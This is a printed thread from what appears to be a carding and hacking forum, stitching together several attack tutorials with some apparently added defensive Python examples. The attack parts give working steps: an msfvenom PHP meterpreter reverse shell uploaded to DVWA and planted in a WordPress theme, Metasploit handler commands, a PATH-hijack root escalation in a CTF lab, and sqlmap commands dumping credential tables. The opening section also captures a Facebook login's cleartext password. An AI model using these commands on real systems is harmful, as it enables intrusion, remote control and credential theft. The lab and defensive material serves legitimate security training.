Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Web Penetration Testing with Tamper Data (Firefox Add-on) - Printable Version




[Guide] How to Web Penetration Testing with Tamper Data (Firefox Add-on) - NINZA - 04-26-2020

Tampering means modifying the request parameters before the request is submitted. It can be done in several ways; one of them is the Tamper Data add-on, one of the most widely used Firefox extensions. It lets you modify the data sent between the client and the server and gives easy access to GET and POST parameters.
Installing Tamper Data Add-On
Select the menu bar on the right end in Firefox. Click on Add-ons.
[Image: 1.png?w=687]
In the search field, search for the Tamper Data add-on and click Install. Once the add-on is installed, restart the Firefox browser.
[Image: 2.png?w=687]
Displaying clear text password in Facebook using Tamper Data
Now I am trying to log in to my Facebook account; when I typed my password I saw it in dotted form, so I wanted to know whether the password I typed was correct. Click on the Tools option in the menu bar and select Tamper Data to capture the request.
[Image: 4.png?w=687]
A Tamper Data pop-up opens; click Start Tamper, which starts capturing outgoing requests. As we know, the username and password typed into the fields are sent with the POST method. Now click the Login button to send the data.
[Image: 5.png?w=687]
When the browser sends the request to the web server, a pop-up appears; hit Tamper to intercept the outgoing request.
[Image: 6.png?w=687]
In the right half of the Tamper pop-up window, as the image shows, the email and pass fields are displayed in clear text. This is the browser's own request body captured before TLS encrypts it, so it shows what any client-side tool can see rather than a weakness of the site.
[Image: 7.png?w=687]
HTML Injection – Reflection POST method with Tamper Data
I have installed bWAPP on my WAMP server running on localhost; it can be accessed through the browser. Navigate to the login page at "localhost/bWAPP/login.php".
Log in to the web application with bee:bug as the credentials, then choose the bug "HTML Injection - Reflected (POST)" from the list of bugs and click Hack.
[Image: 15.png?w=687]
In the given text fields enter first name kunal and last name bhal.
[Image: 16.png?w=687]
Before clicking Go, start Tamper Data again so that the field values can be changed. We will then see the POST values and modify them to change the submitted name.
[Image: 17.png?w=687]
Now click Go; a dialogue box opens, and clicking Tamper captures the request.
[Image: 20.png?w=687]
In the screenshot you can read the captured request, which contains the first and last name kunal:bhal.
[Image: 21.png?w=687]
Tamper Data lets you alter the request after the form has been submitted, bypassing whatever the form itself allowed, so I am going to change the first and last name entered by the user to first and last respectively and then click OK to forward the request.
[Image: 22.png?w=687]
Now you can see the modified request has been forwarded to the web server.
[Image: 23.png?w=687]
We successfully changed the submitted name; here you can see it displayed as "first last". Similarly, you can use Tamper Data against the other bWAPP modules.
[Image: 24.png?w=687]
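The module shows that a value fixed or validated in the browser can still be rewritten before the server sees it, so the only reliable place to defuse reflected markup is on the server, at the point where the value is echoed back. The following is an added Python example, not bWAPP's own code: it parses a constructed POST body of the kind Tamper Data forwards and renders the greeting both as a vulnerable page would (raw reflection) and with output encoding. The field names and the tampered value are assumptions for the demonstration.

```python
import html
from urllib.parse import parse_qs

# Constructed POST body as Tamper Data would forward it after editing:
# the first name has been replaced with markup instead of plain text.
TAMPERED_BODY = "firstname=%3Cb%3Efirst%3C%2Fb%3E&lastname=last&form=submit"


def parse_post(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single string values,
    exactly as the server-side framework would (the browser's form rules no longer
    apply at this point)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(fields: dict) -> str:
    """Reflects the submitted values verbatim: whatever was sent becomes markup."""
    return f"<p>Welcome {fields.get('firstname', '')} {fields.get('lastname', '')}</p>"


def render_hardened(fields: dict) -> str:
    """Encodes the values for an HTML text context before reflecting them;
    the tampered markup is displayed literally instead of being interpreted."""
    first = html.escape(fields.get("firstname", ""), quote=True)
    last = html.escape(fields.get("lastname", ""), quote=True)
    return f"<p>Welcome {first} {last}</p>"


def reflects_raw_markup(rendered: str, submitted: dict) -> bool:
    """True when any submitted value containing a tag survived unencoded."""
    return any("<" in v and v in rendered for v in submitted.values())


if __name__ == "__main__":
    fields = parse_post(TAMPERED_BODY)
    print("vulnerable:", render_vulnerable(fields))
    print("hardened:  ", render_hardened(fields))
```

Output encoding chosen for the context (here html.escape for element text) is the fix; a client-side check, or a form that simply does not offer a way to type a tag, is bypassed exactly as the walkthrough shows.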
File upload using tamper data
Now open DVWA in your browser at your local IP, 192.168.1.102:81/DVWA, and log in with the following credentials:
Username – admin
Password – password
Click DVWA Security, set the security level to medium, then select the File Upload vulnerability.
Open a terminal in Kali Linux and create the PHP backdoor with the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw
Copy and paste the highlighted code into Leafpad and save it on the desktop as hacked.php.png.
Load the Metasploit framework by typing msfconsole and start the multi handler.
[Image: 25.png?w=687]
Now click the Browse button and select the hacked.php.png file to upload.
[Image: 26.png?w=687]
Click on the Tools option in the menu bar and select Tamper Data to capture the request.
[Image: 27.png?w=687]
Before clicking Upload, start Tamper Data again, then click Upload. When the browser sends the request to the web server a pop-up appears; hit Tamper to intercept the outgoing request.
[Image: 28.png?w=687]
As the image shows, Tamper Data has captured the POST request; now copy the selected data from the POST DATA field.
[Image: 29.png?w=687]
Paste the POST DATA into a text file so the extension of our upload can be changed. As you can read, the file name is hacked.php.png, but we want to upload a PHP file.
[Image: 30.png?w=687]
Now change hacked.php.png to hacked.php in the pasted POST DATA, then select and copy the complete data.
[Image: 31.png?w=687]
Now paste the whole content of the text file into the POST DATA field and click OK.
[Image: 32.png?w=687]
The modified request has now been forwarded; click Stop Tamper.
[Image: 33.png?w=687]
From the image, you can see our PHP file is uploaded in the uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where the file is uploaded and open the following URL in the browser to execute it:
//192.168.1.102:81/DVWA/hackable/uploads/hacked.php
[Image: 35.png?w=687]
You will get a reverse connection from the victim in Metasploit.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
meterpreter > sysinfo

I have got a meterpreter session on the victim PC.
[Image: 36.png?w=687]
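The upload succeeds because the file name (and, on DVWA's medium level, the MIME type) is taken from the request, which the client controls and which Tamper Data rewrites in transit. The block below is an added Python example written for this page, not DVWA's code: a server-side checker that applies an extension allowlist to the whole file name, verifies the file's magic bytes against the declared type, refuses content carrying PHP open tags, and stores the file under a server-generated name. The sample PNG header and the PHP stub are constructed for the demonstration, and the Content-Type header is deliberately never consulted.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes each one must begin with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# PHP open tags ("<?php", "<?=") anywhere in the body: a valid image header
# followed by script is how a filter that checks only magic bytes is beaten.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason); every rejection names the failed check."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-sent path
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    if len(parts) > 2:
        # hacked.php.png style names: some server configurations act on the
        # first extension they recognise, so refuse rather than guess.
        return False, "multiple extensions"
    ext = "." + parts[-1]
    if ext not in ALLOWED:
        return False, f"extension {ext} not allowed"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    if PHP_TAG.search(content):
        return False, "embedded script"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Server-chosen random name; the client's file name never reaches disk."""
    return secrets.token_hex(16) + ext


# Constructed inputs for the demonstration.
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_STUB = b"<?php /* constructed stand-in for a PHP payload body */ ?>"

if __name__ == "__main__":
    for name, body in [("hacked.php", PHP_STUB), ("hacked.php.png", PHP_STUB),
                       ("hacked.png", PHP_STUB), ("cat.png", PNG_OK)]:
        print(name, check_upload(name, body))
```

The second half of the defence is where the file lands: an uploads directory with script execution disabled means that even a file that slips through every check is served as bytes, not run as PHP.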

A new challenge for all of you guys!
This CTF is all about capturing the flags we come across as we work through our penetration test of this lab. All flags are in the form: Country name Flag:[md5 hash]. The network interface of this virtual machine takes its IP settings from DHCP.
Download lab from here:

[To see content please register here]

Let’s get started with our first step.
netdiscover
From this, we get our target IP.
Target IP: 192.168.0.103
[Image: 1.png?w=687&ssl=1]
Now we will scan it with nmap, which will list all the open ports on the lab machine for further testing.
nmap -p- -A 192.168.0.103
The result shows that ports 22, 80, 3129, 3306 and 21211 are open, and that an HTTP proxy runs on port 3129.
[Image: 2.1.png?w=687&ssl=1]
So let's proceed with the penetration test. First we'll go with SSH on port 22.
ssh 192.168.0.103
SSH revealed an ASCII dragon with some strings and a base64 string written at the bottom. Looking closer you'll see AES-ECB written at the top.
[Image: 2.png?w=687&ssl=1]
A Google search turned up a website called aesencryption.net where we can decrypt the base64 string from the last result. Decrypting it with the key given in the image gets us our first flag, the ITALY FLAG.
[Image: 3.png?w=687&ssl=1]
Now let's head for the second flag. Since port 80 is also open, we open the target IP in the browser. Look at that: access forbidden. No result.
[Image: 4.png?w=687&ssl=1]
While opening the target IP in the browser we captured the request (and its cookies) with Burp Suite, having set a manual proxy in the browser. Right-click in the window where the intercepted data is shown; an action list appears, and from it click Send to Repeater.
In the screenshot below you will find two panels, left and right, for the request and the response respectively. In the response window, the highlighted text is our flag.
[Image: 5.png?w=687&ssl=1]
As this string is base64, we use the HackBar plugin in Mozilla Firefox, which is preinstalled or can easily be installed. Decoding the string in it gives us another flag, our second: the CROATIA FLAG.
[Image: 6.png?w=687&ssl=1]
Moving on, the nmap result showed an HTTP proxy on port 3129, so we set the browser's proxy to the target IP with port 3129 as shown below.
[Image: 7.png?w=687&ssl=1]
Now try opening the target IP in the browser and wait a few seconds, about 10. The proxy setting did the trick: the website reveals a single page with a changing banner of "WINTER IS COMING" and "ALL MEN MUST DIE". Some of you will recognise this; for those who don't, it is Game of Thrones.
[Image: 8.png?w=687&ssl=1]
The site didn't show much, so I used the Nikto scanner through the proxy to get some information that will help further testing.
nikto -h 192.168.0.103 -useproxy [To see content please register here]

It reveals a WordPress login at /blog.
[Image: 9.png?w=687&ssl=1]
Now open it in the browser. Great, the Game of Thrones theme is confirmed, as a Seven Kingdoms blog is shown.
Scrolling down the site you can see an interesting second post that says 'I have a message for you'. There is a highlighted link, so open it in the browser.
[Image: 10.png?w=687&ssl=1]
Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.
[Image: 11.png?w=687&ssl=1]
[Image: 12.png?w=687&ssl=1]
Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.
[Image: 13.png?w=687&ssl=1]
Decoding the string in the HackBar plugin gives another flag. From this step we got our third flag, the PORTUGAL FLAG.
[Image: 14.png?w=687&ssl=1]
Returning to the previous site, there are several posts which are all useless, so scroll down past them to the last post, which is the one of interest:
'Protected: the secret chapter'
[Image: 15.png?w=687&ssl=1]
Oh! We have to provide a password to get through it. This one took some time, and to spare your time I won't go through my failures.
I created a dictionary of possible passwords, which are simply words taken from the site's pages, with the following command.
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt [To see content please register here]

[Image: 16.png?w=687&ssl=1]
From the list we find that the password is 'westerosi'.
Using this password we reach another page, which reveals another flag as a base64 encoded string, and below it some images of an actress.
[Image: 17.png?w=687&ssl=1]
Decode it again and we have our fourth flag, the PARAGUAY FLAG.
[Image: 18.png?w=687&ssl=1]
Moving one level up, the site gives another message: "the mother_of_dragons has a password which is right in front of your eyes".
Knowing nothing about the actress's eyes, I resorted to Google to see if I could get any clue, but no such luck.
I looked at the message again: it states 'password which is in front of your eyes'.
So the password of mother_of_dragons is 'in front of your eyes'. But wait a minute, where is this password used?
We have an FTP service running, so let's try to get in.
ftp 192.168.0.103 21211
ls -al
get .note.txt
exit
cat .note.txt

Bingo! This is where that password is used. At the bottom, the result shows that the children's names are used for a password. Another password, but this time it is for the WordPress login, which we will use in the coming steps.
[Image: 19.png?w=687&ssl=1]
I googled again and found out she doesn't have any children but had 3 dragons named Drogon, Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.
The list is small, so by trying each one the password can be found.
The password is RhaegalDrogonViserion.
[Image: 20.png?w=687&ssl=1]
Apply the credentials for WordPress and we are in!
Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.
[Image: 21.png?w=687&ssl=1]
As always, decode the base64 string in HackBar and we have another flag.
This is our fifth flag, the THAILAND FLAG.
[Image: 22.png?w=687&ssl=1]
Now with only 2 flags left, it's time for shell access, as we have WordPress admin.
First make a PHP payload with msfvenom which can be used to get a meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
[Image: 23.png?w=687&ssl=1]
As admin of the site I am able to edit the theme, so I replaced the code of the 404.php template in the Viking theme with the highlighted PHP code above.
[Image: 24.png?w=687&ssl=1]
On the other side, to get the meterpreter session, open a Kali terminal and run the multi handler by typing the following commands.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit

As we have a meterpreter session, drop to a shell and type the following commands:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

cd /srv/http
ls

It shows a reward_flag.txt file, so read it with the cat command:
cat reward_flag.txt
As a result, we get a base64 encoded string.
[Image: 25.png?w=687&ssl=1]
Don't worry, this decoding business is nearly over. Decoding this gives us the sixth flag, the MONGOLIA FLAG.
[Image: 26.1.png?w=687&ssl=1]
Back to another file in the listing above, winterfell_messenger. We see it is executable and owned by root, so run it with the following command:
./winterfell_messenger
cat /root/message.txt

It shows that it uses the cat command to read a file in the /root directory.
Running strings on it confirms that cat is called, but without the full path to the program. From this we know it will search the PATH to find cat.
[Image: 26.png?w=687&ssl=1]
We can update PATH with export, but first we need a writable directory, for which we used /tmp. In /tmp we create an executable file named cat so that it is what the winterfell_messenger program calls. This file will run as root, so it simply invokes /bin/bash to give a shell; we also make it executable. Run the following commands:
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

Next we update PATH so that the /tmp directory comes first. For this type the following command:
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now go back to the http directory where the file lives. For that type:
cd /srv/http
ls

Now run winterfell_messenger with the given command and check the result with id:
./winterfell_messenger
id

[Image: 27.png?w=687&ssl=1]
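The escalation works only because winterfell_messenger runs cat by bare name and inherits the caller's PATH. The Python helpers below are an added example, not part of the CTF image or of the binary: they reproduce the PATH lookup over a constructed view of the box's filesystem (path, mode bits, owner), report the PATH entries a privileged program should never trust, and show the absolute-path lookup a fixed program would use instead. The entries in FS are assumptions made for the demonstration.

```python
import os
import stat
from typing import Dict, List, Optional, Tuple

# Constructed view of the target: path -> (mode bits, owner uid).
FS: Dict[str, Tuple[int, int]] = {
    "/usr/local/sbin": (0o755, 0),
    "/usr/local/bin": (0o755, 0),
    "/usr/sbin": (0o755, 0),
    "/usr/bin": (0o755, 0),
    "/usr/bin/cat": (0o755, 0),
    "/tmp": (0o1777, 0),        # world-writable, sticky
    "/tmp/cat": (0o777, 1000),  # the planted wrapper, owned by an ordinary user
}
ORIGINAL_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"
POISONED_PATH = "/tmp:" + ORIGINAL_PATH


def resolve(cmd: str, path: str, fs: Dict[str, Tuple[int, int]] = FS) -> Optional[str]:
    """First PATH entry holding an executable named cmd, as execvp or system() would pick."""
    for d in path.split(":"):
        candidate = d.rstrip("/") + "/" + cmd
        info = fs.get(candidate)
        if info is not None and info[0] & stat.S_IXUSR:
            return candidate
    return None


def risky_entries(path: str, fs: Dict[str, Tuple[int, int]] = FS,
                  trusted_uid: int = 0) -> List[str]:
    """PATH entries that are empty/relative, missing, world-writable, or not root-owned.
    Any of these lets an unprivileged user decide which 'cat' a root process runs."""
    out = []
    for d in path.split(":"):
        if not d or not os.path.isabs(d):
            out.append(d or ".")      # an empty entry means the current directory
            continue
        info = fs.get(d)
        if info is None or info[0] & stat.S_IWOTH or info[1] != trusted_uid:
            out.append(d)
    return out


def fixed_invocation(cmd: str, fs: Dict[str, Tuple[int, int]] = FS) -> str:
    """What the program should have done: use an absolute path and ignore PATH."""
    for d in ("/usr/bin", "/bin"):
        if d + "/" + cmd in fs:
            return d + "/" + cmd
    raise FileNotFoundError(cmd)


if __name__ == "__main__":
    print("clean PATH  ->", resolve("cat", ORIGINAL_PATH))
    print("poisoned    ->", resolve("cat", POISONED_PATH), risky_entries(POISONED_PATH))
```

The same shadowing is why the walkthrough later reads the flag with /usr/sbin/cat by full path: once /tmp is first in PATH, the planted wrapper is what a bare cat resolves to for the attacker's own shell as well.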
Now go to /root, where we have a .flag.txt file.
Running cat against .flag.txt gives us a congratulations message, a wolf made of ASCII characters and a base64 encoded string at the bottom. The full path to cat is used because our /tmp/cat now shadows the real one. The commands are given below.
cd /root
/usr/sbin/cat .flag.txt

[Image: 28.png?w=687&ssl=1]
Finally, decoding it in HackBar reveals the seventh and last flag, the SOMALIA FLAG.
[Image: 29.png?w=687&ssl=1]
Voilà. We have reached the end and the job is done. Hope you enjoyed it and your penetration testing skills are refreshed.

In this tutorial you will learn how to perform a SQL injection attack on a login form. There are many examples of login forms, such as Facebook login, Gmail login and other online accounts, which ask you to submit a username and password and then grant access to your account on that web server. Here we are going to perform a SQL injection attack on the login form of a deliberately vulnerable web application and then fetch the information inside its database.
Requirement:
  • Xampp/Wamp Server
  • bWAPP Lab
  • Kali Linux: Burp suite, sqlmap tool
First you need to install the bWAPP lab on your XAMPP or WAMP server; read the full article at

[To see content please register here]

Now open bWAPP on your PC and log in with the credentials given below.
Let's begin!
Start the Apache and MySQL services in XAMPP or WAMP. Open the localhost address in the browser; I am using 192.168.1.102:81/bWAPP/login.php. Enter the user and password as bee and bug respectively.
Set the security level to low, choose the bug SQL Injection (Login Form/Hero) from the list box and click Hack.
[Image: 1.png?w=687&ssl=1]
A login form opens asking for the credentials of a superhero, which we don't know. So I am going to enter a random login and password such as iron:man in order to capture the request with Burp Suite.
[Image: 2.png?w=687&ssl=1]
To capture the bWAPP request, click the Proxy tab, click the "Intercept is on" button, come back to bWAPP and click Login. The highlighted intercepted data is used in the sqlmap commands.
[Image: 3.png?w=687&ssl=1]
Now open a terminal in Kali Linux and type the following command to enumerate the database names.
sqlmap -u [To see content please register here] --data="login=iron&password=man&form=submit" --method POST --dbs --batch

[Image: 4.png?w=687&ssl=1]
From the enumeration result we learn that the back-end database management system is MySQL 5.5, the web server operating system is Windows with Apache 2.4.7 and PHP 5.5.9, and we get the names of all databases. As the image below shows, we have all the database names. Choose any one to fetch more details.
[Image: 5.png?w=687&ssl=1]
Now type the command below, which tries to dump all the data from the bwapp database.
sqlmap -u [To see content please register here] --data="login=iron&password=man&form=submit" --method POST -D bwapp --dump all --batch

[Image: 6.1.png?w=687&ssl=1]
First I found a table "BLOG" which contains four columns, but this table appears to be empty, as all fields are left blank.
[Image: 6.png?w=687&ssl=1]
Next I found the table "MOVIES" in the bwapp database; as the screenshot shows, it contains movie details, with 10 entries in each column.
[Image: 7.png?w=687&ssl=1]
Luckily, I got data containing id, login, password and secret entries from the "HEROES" table; maybe this dumped data can help me get past the login page we opened in the browser. I will use the login and password later to verify it.
[Image: 8.png?w=687&ssl=1]
Here I found only three entries in the "USERS" table of bwapp, which also contains the credentials for the admin account.
[Image: 9.png?w=687&ssl=1]
Another empty table, "VISITORS", is, like the "BLOG" table, left blank.
Sqlmap has dumped a great deal of data from the bwapp database; as you have seen, I got data from several tables. Now let's verify the result. Browse to bWAPP on localhost again and open the login form page once more.
[Image: 10.png?w=687&ssl=1]
If you remember, sqlmap dumped the "HEROES" table, which contains logins and passwords; I will use the fetched pair (thor:Asgard) to log in.
Type thor in the login field and Asgard as the password, then click Login.
[Image: 15.png?w=687&ssl=1]
Congrats! We logged in successfully, and you can read the secret given for Thor, which is exactly the same as in the "heroes" table.
Conclusion: in this article we have learned how to attack the login form of a website and retrieve data from its database.
[Image: 16.png?w=687&ssl=1]
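The login form falls to sqlmap because the submitted login and password are pasted into the SQL text, so a quote in the input changes the query's structure. As an added example, not bWAPP's own code, the Python block below builds a constructed HEROES table in an in-memory SQLite database with the columns the dump showed (id, login, password, secret) and runs the same lookup once with string interpolation and once with bound parameters; the secrets and the second hero are made up for the test.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for bWAPP's heroes table (same columns as the dump)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE heroes (id INTEGER PRIMARY KEY, login TEXT, password TEXT, secret TEXT)"
    )
    con.executemany(
        "INSERT INTO heroes (login, password, secret) VALUES (?, ?, ?)",
        [
            ("thor", "Asgard", "constructed secret for thor"),
            ("ironman", "constructed-pw", "constructed secret for ironman"),
        ],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, login: str, password: str):
    """Interpolates user input into the SQL text: the pattern sqlmap exploits above.
    A quote in the input closes the string literal and the rest becomes SQL."""
    sql = (
        "SELECT login, secret FROM heroes "
        f"WHERE login = '{login}' AND password = '{password}'"
    )
    return con.execute(sql).fetchone()


def login_hardened(con: sqlite3.Connection, login: str, password: str):
    """Bound parameters keep the input as data, whatever characters it contains."""
    sql = "SELECT login, secret FROM heroes WHERE login = ? AND password = ?"
    return con.execute(sql, (login, password)).fetchone()


# Constructed inputs: the pair the dump revealed, and a boolean probe of the
# kind sqlmap sends (a quote to close the literal, then an always-true OR).
VALID = ("thor", "Asgard")
PROBE = ("thor' OR '1'='1", "not-the-password")

if __name__ == "__main__":
    con = make_db()
    print("valid, vulnerable :", login_vulnerable(con, *VALID))
    print("probe, vulnerable :", login_vulnerable(con, *PROBE))
    print("probe, hardened   :", login_hardened(con, *PROBE))
```

With the parameterised form no input can alter the shape of the query, which is what defeats the enumeration the page runs with sqlmap; that the dumped passwords were stored in clear text is a separate weakness the HEROES and USERS dumps illustrate.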
This article shows how to scan a target for SQL injection using Nmap and then exploit it with sqlmap if Nmap finds it vulnerable. Follow the tutorial for the details.
First type [To see content please register here] in the URL bar to browse Acunetix's test web application, then click the link given for the Acuart URL as shown in the screenshot.

[Image: 1.png?w=687&ssl=1]
The required web page opens; testphp.vulnweb.com is our target host, and we now scan it with nmap to identify possible SQL injection.
[Image: 2.png?w=687&ssl=1]
Nmap has an NSE script, http-sql-injection, which scans a web application for SQL injection vulnerabilities. From its description:
Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
The script spiders an HTTP server looking for URLs containing queries. It then proceeds to combine crafted SQL commands with susceptible URLs in order to obtain errors. The errors are analyzed to see if the URL is vulnerable to attack. This uses the most basic form of SQL injection but anything more complicated is better suited to a standalone tool.
We may not have access to the target web server’s true hostname, which can prevent access to virtually hosted sites.
Now type the following command to scan the target for SQL injection possibilities.
nmap -sV --script=http-sql-injection [To see content please register here] -p 80

From the screenshot you can see that it has listed the queries that may be vulnerable to SQL injection. Now let's open one of these queries in the browser.
Note: remove http:// from the resulting queries while browsing.
[Image: 3.png?w=687&ssl=1]
The page shows a warning about an error in the database query. Now let's feed the query Nmap reported into sqlmap and find out whether Nmap's result is correct about the SQL injection vulnerability.
[Image: 4.png?w=687&ssl=1]
Open a terminal in Kali Linux and type the following sqlmap command:
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%20OR%20sqlspider" --dbs --batch

[Image: 5.png?w=687&ssl=1]
We got the database name by passing Nmap's query to sqlmap; you can read the database name acuart in the screenshot.
[Image: 6.png?w=687&ssl=1]
Now dump all the data in this database by typing the following command:
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%20OR%20sqlspider" -D acuart --dump-all

[Image: 7.png?w=687&ssl=1]
This will dump all available information inside the database. Now try it by yourself.
[Image: 8.png?w=687&ssl=1]
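On the receiving side, the http-sql-injection script is easy to spot in web server logs: it appends a quote and OR sqlspider to every query parameter it finds, and a probed page that answers with a 5xx suggests the injected quote reached the database. The block below is an added Python example, not part of the article or of Nmap, that parses constructed Apache combined-format log lines, percent-decodes each query parameter, flags values matching the probe, and summarises the hits per source address.

```python
import re
from urllib.parse import parse_qs, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# The NSE script's marker payload: a closing quote, OR, and the literal word
# sqlspider. The second alternative also catches the classic quote-OR-digit form.
SQLI_PROBE = re.compile(r"""['"]\s*or\s+(sqlspider|['"]?\d)""", re.IGNORECASE)

# Constructed sample log lines (Apache combined format, truncated after the size).
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2020:10:00:01 +0000] "GET /search.php?test=query HTTP/1.1" 200 1043
203.0.113.5 - - [26/Apr/2020:10:00:02 +0000] "GET /search.php?test=query%27%20OR%20sqlspider HTTP/1.1" 200 1204
203.0.113.5 - - [26/Apr/2020:10:00:03 +0000] "GET /listproducts.php?cat=1%27%20OR%20sqlspider HTTP/1.1" 500 512
198.51.100.7 - - [26/Apr/2020:10:05:00 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 3321
"""


def parse_line(line: str):
    """Split one log line into source, request target and status; None if malformed."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so %27%20OR%20 becomes the literal probe text.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_probes(log_text: str) -> list:
    """(ip, path, parameter, decoded value, status) for every probed parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                if SQLI_PROBE.search(value):
                    hits.append((rec["ip"], rec["path"], name, value, rec["status"]))
    return hits


def summarize(hits: list) -> dict:
    """Per source address: probes seen and how many drew a 5xx from the server."""
    out = {}
    for ip, _path, _param, _value, status in hits:
        entry = out.setdefault(ip, {"probes": 0, "errors": 0})
        entry["probes"] += 1
        if status.startswith("5"):
            entry["errors"] += 1
    return out


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
    print(summarize(find_probes(SAMPLE_LOG)))
```

A parameter that both matches the probe and returned a 5xx is the one to triage first: it is the same signal the page reads from the browser's database error message, seen from the server's side.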